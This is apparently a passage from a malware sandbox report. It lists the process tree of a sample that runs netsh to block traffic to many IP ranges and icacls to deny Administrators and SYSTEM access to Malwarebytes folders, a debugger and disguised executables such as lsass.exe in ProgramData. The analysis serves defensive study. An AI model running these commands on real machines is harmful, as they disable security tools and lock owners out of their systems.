        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
          PID:4056
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
            PID:4840
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
          PID:1408
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
            PID:4984
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
          PID:4824
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
            PID:5016
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
          PID:4496
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
            PID:4164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
          PID:4492
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
            PID:4184
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
          PID:4724
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
            PID:4168
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
          PID:4932
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
            PID:4508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
          PID:2568
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
            PID:4948
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
          PID:3124
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
            PID:4632
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
          PID:4248
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
            PID:5044
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
          PID:4600
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
            PID:4680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
          PID:1468
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
            PID:4884
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
          PID:4676
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
            PID:4880
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
          PID:4772
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
            PID:4284
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
          PID:4976
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
            PID:4368
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
          PID:4776
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
            PID:5108
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
          PID:4256
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
            PID:4504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
          PID:4476
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
            PID:4144
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
          PID:4748
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
            PID:5260
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
          PID:5084
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
            PID:5252
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
          PID:4468
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
            PID:5416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
          PID:5140
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
            PID:5324
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
          PID:5288
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
            PID:5564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
          PID:5316
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
            PID:5480
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
          PID:5468
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
            PID:5620
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
          PID:5492
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
            PID:5680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
          PID:5632
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
            PID:5872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
          PID:5644
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
            PID:5788
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
          PID:5800
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
            PID:5944
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
          PID:5820
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
            PID:5932
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
          PID:5968
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
            PID:6092
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
          PID:5984
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
            PID:5064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
          PID:6108
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
            PID:5508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
          PID:6120
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
            PID:4876
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
          PID:5296
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
            PID:5092
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
          PID:5364
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
            PID:5076
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
          PID:4220
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
            PID:4920
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
          PID:4108
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
            PID:4312
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
          PID:4520
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4576
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
          PID:6132
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:4344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
          PID:4416
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
            PID:5040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
          PID:1736
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
          PID:1460
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
            PID:5232
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
          PID:5276
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
            PID:4132
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
          PID:5384
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
            PID:5168
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
          PID:5548
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
            PID:5616
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
          PID:5240
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:3380
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
          PID:5584
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
            PID:5752
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          PID:5504
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:4120
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
          PID:5700
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny Администраторы:(F)
            PID:5124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
          PID:5732
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny System:(F)
            PID:2360
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
          PID:5744
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny система:(F)
            Modifies file permissions
            PID:4580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
          PID:5924
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4192
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          PID:5496
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5272
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
          PID:3216
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
            PID:4912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
          PID:6088
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5628
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
          PID:5972
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny Администраторы:(F)
            PID:5344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
          PID:2404
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny System:(F)
            PID:4364
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
          PID:5828
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny система:(F)
            PID:5208
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
          PID:5832
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5536
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          PID:5312
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5320
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
          PID:4100
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
            PID:5768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          PID:5172
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5160
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
          PID:3976
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          PID:4236
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
          PID:4964
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2804
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
          PID:4384
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
            PID:5792
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
          PID:6140
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
            PID:4432
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          PID:5368
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:6012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
          PID:1720
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
            PID:5224
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
          PID:5328
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny System:(F)
            Modifies file permissions
            PID:5708
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
          PID:5604
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny Администраторы:(F)
            PID:5880
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
          PID:5692
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny System:(F)
            Modifies file permissions
            PID:6068
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
          PID:5684
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:4204
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
          PID:6048
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny System:(F)
            Modifies file permissions
            PID:5888
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
          PID:2900
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
            Modifies file permissions
            PID:6036
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
          PID:5244
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny System:(F)
            Modifies file permissions
            PID:5036
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
          PID:5268
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny Администраторы:(F)
            Modifies file permissions
            PID:4844
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
          PID:5600
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny System:(F)
            PID:5000
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
          PID:5896
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5640
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
          PID:5332
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny System:(F)
            PID:5148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
          PID:5696
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:908
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
          PID:4400
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny System:(F)
            Modifies file permissions
            PID:5892
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
          PID:4544
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny Администраторы:(F)
            PID:4288
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
          PID:4704
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny System:(F)
            Modifies file permissions
            PID:4200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
          PID:5856
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          PID:6128
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:1004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
          PID:6028
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3848
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
          PID:4752
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5668
        • C:\Windows\SysWOW64\cmd.exe
